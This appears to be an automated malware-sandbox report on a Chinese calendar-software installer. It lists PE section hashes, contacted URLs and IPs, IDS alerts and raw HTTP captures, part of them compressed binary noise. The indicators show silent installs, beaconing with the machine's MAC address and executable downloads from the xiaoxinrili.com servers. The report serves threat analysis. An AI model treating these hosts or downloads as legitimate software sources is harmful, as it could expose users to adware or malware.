Legal Copyright: Copyright (c) 2012-2014 ????, Inc.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2014.1231.1429.17
File Description: ?????????????
Comments: This installation was built with Inno Setup.
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 61740 61952 4.43024 3a126e478661f20816f9d9285615f98e
.itext 69632 2884 3072 3.97317 ba48b9b17b3dd8b92da3bd93f20ddb34
.data 73728 3208 3584 1.55702 d7fd5f4b562d7961758f3d6a8c834fd0
.bss 77824 22196 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 102400 3536 3584 3.44625 93d91a2b90e60bd758fc0c4908856ae1
.tls 106496 8 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 110592 24 512 0.14174 3dffc444ccc131c9dcee18db49ee6403
.rsrc 114688 45568 45568 2.86895 3795fb89fbfecd85594d38cfa6b28bf5

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://ini.xiaoxinrili.com/ini/read.php?t=slt&d=2014123114&c= 183.61.16.141
hxxp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe 183.61.9.60
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=5467330&web_id=5467330
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=5467330&t=z
hxxp://all.cnzz.com.danuoyi.tbcache.com/c.php?id=30085361&l=3
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=30085361&l=3&t=q
hxxp://js.users.51.la/16246473.js 222.187.225.125
hxxp://z.gds.cnzz.com/stat.htm?id=5467330&r=&lg=en-us&ntime=none&cnzz_eid=1312808906-1421232890-&showp=1276x846&t=&h=1&rnd=2027361058
hxxp://count.xiaoxinrili.com/metro?sid=000C29FD55AD&s=B867EF90584DBE7ADA2C745D5A27E8C6&type=silent&appname=w5DCocOQw4LDiMOVw4DDug==&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&pn=inst 183.61.9.244
hxxp://q.gds.cnzz.com/stat.htm?id=30085361&r=&lg=en-us&ntime=none&cnzz_eid=162298059-1421232891-&showp=1276x846&t=&h=1&rnd=942284497
hxxp://update.xiaoxinrili.com/ico/xiangmu2.ico 183.61.9.60
hxxp://icon.ajiang.net/icon_9.gif 125.46.49.200
hxxp://update.xiaoxinrili.com/tj/a1.html?%original file name%.exe&type=silent&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno= 183.61.9.60
hxxp://www.a.shifen.com/
hxxp://update.xiaoxinrili.com/appImg/appimg.txt 183.61.9.60
hxxp://update.xiaoxinrili.com/appImg/AppCloud4.2.xml 183.61.9.60
hxxp://update.xiaoxinrili.com/PopBoxSmall.txt 183.61.9.60
hxxp://update.xiaoxinrili.com/Version.txt 183.61.9.60
hxxp://update.xiaoxinrili.com/PopBoxBig.txt 183.61.9.60
hxxp://update.xiaoxinrili.com/htmlinset1.txt 183.61.9.60
hxxp://update.xiaoxinrili.com/update.txt 183.61.9.60
hxxp://update.xiaoxinrili.com/md5.txt 183.61.9.60
hxxp://count.xiaoxinrili.com/city 183.61.9.244
hxxp://update.xiaoxinrili.com/Install.txt 183.61.9.60
hxxp://count.xiaoxinrili.com/metro?sid=000C29FD55AD&s=B867EF90584DBE7ADA2C745D5A27E8C6&type=silent&appname=w5DCocOQw4LDiMOVw4DDug==&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&pn=adslist&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno= 183.61.9.244
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=5554906&web_id=5554906
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=5554906&t=z
hxxp://update.xiaoxinrili.com/uCalhtml.txt 183.61.9.60
hxxp://update.xiaoxinrili.com/daohang/sj.xml 183.61.9.60
hxxp://update.xiaoxinrili.com/daohang/yx.xml 183.61.9.60
hxxp://update.xiaoxinrili.com/weather.txt 183.61.9.60
hxxp://update.xiaoxinrili.com/qian.html?%original file name%.exe 183.61.9.60
hxxp://update.xiaoxinrili.com/daohang/tubiao.xml 183.61.9.60
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=4881483&web_id=4881483
hxxp://count.xiaoxinrili.com/?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json 183.61.9.244
hxxp://update.xiaoxinrili.com/InstProtect.txt 183.61.9.60
hxxp://update.xiaoxinrili.com/tj.html?%original file name%.exe 183.61.9.60
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=4878044&web_id=4878044
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=4878044&t=z
hxxp://z.gds.cnzz.com/stat.htm?id=4878044&r=&lg=en-us&ntime=none&cnzz_eid=1356438655-1421233298-&showp=1276x846&t=undefinedundefined&h=1&rnd=275871552
hxxp://cfg.pub.wandoujia.com/conn_engine_config_ini.php?ver=0&vendor=100000511 60.28.208.11
hxxp://count.xiaoxinrili.com/startup?appname=5bCP5paw5pel5Y6G&version=4.0&sid=00-0C-29-FD-55-AD&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&s=5ADBD1D5A76F0851324A6BD5DB34474B 183.61.9.244
hxxp://dl.wandoujia.com/files/conn_engine/2.69.0.5490.zip 125.39.216.11
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=1658784305 42.120.219.171
hxxp://cnzz.mmstat.com/app.gif?&cna=RkY9DbJslnYCAcGK9OdJn7XJ 42.120.219.171
hxxp://360.band.glb0.ldcache.net/hezi/xxurl.html?iexplore.exe
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=1253322244
hxxp://c01.i77.rpnic.hadns.net/files/conn_engine/2.69.0.5490.zip
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=1253322244&t=z
hxxp://z.gds.cnzz.com/stat.htm?id=1253322244&r=&lg=en-us&ntime=none&cnzz_eid=307117902-1421236297-&showp=1276x846&t=&h=1&rnd=31178880
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=1291768977 42.120.219.171
hxxp://360.band.glb0.ldcache.net/ico/Icon_1.ico
hxxp://update.xiaoxinrili.com/tmp.exe 183.61.9.60
hxxp://update.xiaoxinrili.com/daohang/jsq/tj.html?%original file name%.exe 183.61.9.60
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=5614889
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=5614889&t=z
hxxp://update.xiaoxinrili.com/FMTFilterinset.txt 183.61.9.60
hxxp://z.gds.cnzz.com/stat.htm?id=5614889&r=&lg=en-us&ntime=none&cnzz_eid=808136781-1421233891-&showp=1276x846&t=&h=1&rnd=531066514
hxxp://count.xiaoxinrili.com/startup?appname=cmlsaXF1aWNrZW4=&version=4.0&sid=00-0C-29-FD-55-AD&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&s=5ADBD1D5A76F0851324A6BD5DB34474B 183.61.9.244
hxxp://c.cnzz.com/core.php?web_id=30085361&l=3&t=q 195.27.31.246
hxxp://fw1.dl.wdjcdn.com/files/conn_engine/2.69.0.5490.zip 58.220.2.7
hxxp://www.baidu.com/ 180.76.3.151
hxxp://s19.cnzz.com/stat.php?id=4878044&web_id=4878044 1.99.192.16
hxxp://hzs23.cnzz.com/stat.htm?id=5467330&r=&lg=en-us&ntime=none&cnzz_eid=1312808906-1421232890-&showp=1276x846&t=&h=1&rnd=2027361058 1.122.192.18
hxxp://c.cnzz.com/core.php?web_id=5554906&t=z 195.27.31.246
hxxp://w.cnzz.com/c.php?id=30085361&l=3 1.99.192.14
hxxp://s9.cnzz.com/stat.php?id=5614889 1.99.192.15
hxxp://hzs10.cnzz.com/stat.htm?id=5614889&r=&lg=en-us&ntime=none&cnzz_eid=808136781-1421233891-&showp=1276x846&t=&h=1&rnd=531066514 1.122.192.18
hxxp://z9.cnzz.com/stat.htm?id=1253322244&r=&lg=en-us&ntime=none&cnzz_eid=307117902-1421236297-&showp=1276x846&t=&h=1&rnd=31178880 1.122.192.15
hxxp://c.cnzz.com/core.php?web_id=1253322244&t=z 195.27.31.246
hxxp://hqs5.cnzz.com/stat.htm?id=30085361&r=&lg=en-us&ntime=none&cnzz_eid=162298059-1421232891-&showp=1276x846&t=&h=1&rnd=942284497 1.113.192.17
hxxp://c.cnzz.com/core.php?web_id=5614889&t=z 195.27.31.246
hxxp://s14.cnzz.com/stat.php?id=5554906&web_id=5554906 1.99.192.16
hxxp://k780.xiaoxinrili.com/?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json 183.61.9.244
hxxp://s19.cnzz.com/stat.php?id=4881483&web_id=4881483 1.99.192.16
hxxp://c.cnzz.com/core.php?web_id=4878044&t=z 195.27.31.246
hxxp://dl.cdn.wandoujia.com/files/conn_engine/2.69.0.5490.zip 125.39.216.11
hxxp://down.xiaoxinrili.com/hezi/xxurl.html?iexplore.exe 202.97.174.82
hxxp://7day.xiaoxinrili.com/city 183.61.9.244
hxxp://update.redshu.com/ico/xiangmu2.ico 183.61.9.60
hxxp://s5.cnzz.com/stat.php?id=1253322244 1.99.192.15
hxxp://c.cnzz.com/core.php?web_id=5467330&t=z 195.27.31.246
hxxp://down.xiaoxinrili.com/ico/Icon_1.ico 202.97.174.82
hxxp://s23.cnzz.com/stat.php?id=5467330&web_id=5467330 1.99.192.16
web2.51.la 117.21.224.131
pcookie.cnzz.com 42.120.219.171
hzs19.cnzz.com 1.122.192.18
hzs14.cnzz.com 1.122.192.18


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send html content

Traffic

GET /Version.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Aug 2014 08:02:10 GMT
Accept-Ranges: bytes
ETag: "2ec9bb38a8b3cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:30 GMT
Content-Length: 1
0....


GET /htmlinset1.txt HTTP/1.1


User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 09 Dec 2014 01:47:57 GMT
Accept-Ranges: bytes
ETag: "79ff2c285213d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:31 GMT
Content-Length: 4
1,30HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Tue, 09 
Dec 2014 01:47:57 GMT..Accept-Ranges: bytes..ETag: "79ff2c285213d01:0"
..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 
2015 11:53:31 GMT..Content-Length: 4..1,30....


GET /md5.txt HTTP/1.1


User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Aug 2014 07:53:04 GMT
Accept-Ranges: bytes
ETag: "c1e7b39e14b2cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:31 GMT
Content-Length: 32
7CD80588C0C5215F6D688092950FE3E2HTTP/1.1 200 OK..Content-Type: text/pl
ain..Last-Modified: Thu, 07 Aug 2014 07:53:04 GMT..Accept-Ranges: byte
s..ETag: "c1e7b39e14b2cf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By:
 ASP.NET..Date: Wed, 14 Jan 2015 11:53:31 GMT..Content-Length: 32..7CD
80588C0C5215F6D688092950FE3E2....


GET /uCalhtml.txt HTTP/1.1


User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 17 Apr 2014 09:26:29 GMT
Accept-Ranges: bytes
ETag: "a3115a1d1f5acf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:32 GMT
Content-Length: 34
1|1F5083874528F2BF4E8B1F075214C827HTTP/1.1 200 OK..Content-Type: text/
plain..Last-Modified: Thu, 17 Apr 2014 09:26:29 GMT..Accept-Ranges: by
tes..ETag: "a3115a1d1f5acf1:0"..Server: Microsoft-IIS/7.5..X-Powered-B
y: ASP.NET..Date: Wed, 14 Jan 2015 11:53:32 GMT..Content-Length: 34..1
|1F5083874528F2BF4E8B1F075214C827....


GET /qian.html?%original file name%.exe HTTP/1.1


Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896


HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Wed, 26 Dec 2012 10:36:08 GMT
Accept-Ranges: bytes
ETag: "d828ad154e3cd1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:34 GMT
Content-Length: 204
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?".7..X.iSO?.h...Gw.6......~0.V..
M....|.{......v......|...??J.ly.....>.Nv..f...=. ..~....I*@.f...HTT
P/1.1 200 OK..Content-Type: text/html..Content-Encoding: gzip..Last-Mo
dified: Wed, 26 Dec 2012 10:36:08 GMT..Accept-Ranges: bytes..ETag: "d8
28ad154e3cd1:0"..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..X-P
owered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:34 GMT..Content-Lengt
h: 204...............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.
@......{....{....;.N'...?\fd.l..J...!....?~|.?".7..X.iSO?.h...Gw.6....
..~0.V..M....|.{......v......|...??J.ly.....>.Nv..f...=. ..~....I*@
.f.......


GET /weather.txt HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 13 Nov 2014 06:14:04 GMT
Accept-Ranges: bytes
ETag: "8ee53b69ffcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:39 GMT
Content-Length: 38
12154|1b5d950e15ba193e96405dd75be5ab1fHTTP/1.1 200 OK..Content-Type: t
ext/plain..Last-Modified: Thu, 13 Nov 2014 06:14:04 GMT..Accept-Ranges
: bytes..ETag: "8ee53b69ffcf1:0"..Server: Microsoft-IIS/7.5..X-Powered
-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:39 GMT..Content-Length: 38.
.12154|1b5d950e15ba193e96405dd75be5ab1f....


GET /daohang/jsq/tj.html?%original file name%.exe HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298


HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Tue, 26 Aug 2014 06:43:54 GMT
Accept-Ranges: bytes
ETag: "b6fbf11af9c0cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:59 GMT
Content-Length: 427
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"...Ey..'..y6..E.f.t..M.~...=.&g
t;..........].o...Vm.^...>j.w.....3..o]fu:]........jZ..g...G..]5.&g
t;J?.,.U.."_....fmQ-......H?J......../.q...wU.m..^..4[.[....Nf.eZ.>
..{n.....i........p......)5.K..7A7m..g...~.A...............W...~.Y1...
=5@...wh`........9$...D!CB..t....b....w........?(.N....[..."......k...
.....M.f...9|.p....HTTP/1.1 200 OK..Content-Type: text/html..Content-E
ncoding: gzip..Last-Modified: Tue, 26 Aug 2014 06:43:54 GMT..Accept-Ra
nges: bytes..ETag: "b6fbf11af9c0cf1:0"..Vary: Accept-Encoding..Server:
 Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:5
3:59 GMT..Content-Length: 427...............`.I.%&/m.{.J.J..t...`.$..@
.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?"
...Ey..'..y6..E.f.t..M.~...=.>..........].o...Vm.^...>j.w.....3.
.o]fu:]........jZ..g...G..]5.>J?.,.U.."_....fmQ-......H?J......../.
q...wU.m..^..4[.[....Nf.eZ.>..{n.....i........p......)5.K..7A7m..g.
..~.A...............W...~.Y1...=5@...wh`........9$...D!CB..t....b....w
........?(.N....[..."......k........M.f...9|.p......



GET / HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0


HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu e60e7b6c35705ff816372734f70b6014
Expires: Wed, 14 Jan 2015 11:50:51 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xa7cae7870000b576
BDUSERID: 0
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
15092..<!DOCTYPE html><!--STATUS OK--><html><head
><meta http-equiv="content-type" content="text/html;charset=utf-
8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><m
eta content="always" name="referrer"><link rel="dns-prefetch" hr
ef="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baid
u.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><l
ink rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-pre
fetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//
t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/
><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title
>...........................</title>.<style index="index" 
 id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper
{position:relative;_position:;min-height:100%}#head{padding-bottom:100
px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;
bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overf
low:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text
-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-styl
e:none}body,form,#fm{position:relative}td{text-align:left}img{border:0
}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.b
dstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);backgrou
nd-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www
/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{
<<< skipped >>>


GET /city HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: 7day.xiaoxinrili.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:44 GMT; path=/; HttpOnly
Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:44 GMT; path=/; httponly
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 11:49:44 GMT
1..1..0......


GET /city HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: 7day.xiaoxinrili.com
Connection: Keep-Alive
Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5


HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:45 GMT; path=/; httponly
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 11:49:45 GMT
1..1..0......


GET /city HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: 7day.xiaoxinrili.com
Connection: Keep-Alive
Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5


HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:46 GMT; path=/; httponly
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 11:49:46 GMT
1..1..0......


GET /city HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: 7day.xiaoxinrili.com
Connection: Keep-Alive
Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5


HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:46 GMT; path=/; httponly
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 11:49:46 GMT
1..1..0..HTTP/1.1 200 OK..Server: nginx/1.4.2..Content-Type: text/html
; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..X
-Powered-By: PHP/5.4.17..Set-Cookie: laravel_session=2du4a4mvl5rvm8m4a
ufe91u2b5; expires=Wed, 14-Jan-2015 13:49:46 GMT; path=/; httponly..Ca
che-Control: no-cache..Date: Wed, 14 Jan 2015 11:49:46 GMT..1..1..0..



GET /core.php?web_id=5467330&t=z HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 751
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:37:38 GMT
Last-Modified: Wed, 14 Jan 2015 11:37:38 GMT
Expires: Wed, 14 Jan 2015 11:52:38 GMT
Age: 818
X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:38 GMT
X-Swift-CacheTime: 900
Via: cache4.de1[0,200-0,H], cache5.de1[1,0]
!function(){var p,q,r,a=encodeURIComponent,b="5467330",c="",d="",e="on
line_v3.php",f="hzs23.cnzz.com",g="1",h="text",i="z",j="站໳
1;统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1
",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f
),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.c
allRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScr
iptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web
_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img
/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><i
mg border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a hre
f='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon
([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application
/javascript..Content-Length: 751..Connection: keep-alive..Date: Wed, 1
4 Jan 2015 11:37:38 GMT..Last-Modified: Wed, 14 Jan 2015 11:37:38 GMT.
.Expires: Wed, 14 Jan 2015 11:52:38 GMT..Age: 818..X-Cache: HIT TCP_ME
M_HIT dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:38 GMT..X-S
wift-CacheTime: 900..Via: cache4.de1[0,200-0,H], cache5.de1[1,0]..!fun
ction(){var p,q,r,a=encodeURIComponent,b="5467330",c="",d="",e="online
_v3.php",f="hzs23.cnzz.com",g="1",h="text",i="z",j="站长&#
32479;计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=
l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.
push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.c
<<< skipped >>>

GET /core.php?web_id=30085361&l=3&t=q HTTP/1.1


Accept: */*
Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 750
Connection: keep-alive
Date: Wed, 14 Jan 2015 11:37:40 GMT
Last-Modified: Wed, 14 Jan 2015 11:37:40 GMT
Expires: Wed, 14 Jan 2015 11:52:40 GMT
Age: 816
X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:40 GMT
X-Swift-CacheTime: 900
Via: cache1.de1[0,200-0,H], cache5.de1[0,0]
!function(){var p,q,r,a=encodeURIComponent,b="30085361",c="3",d="",e="
online_v3.php",f="q5.cnzz.com",g="1",h="text",i="q",j="全景
;统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1"
,n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f)
,o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.ca
llRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScri
ptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_
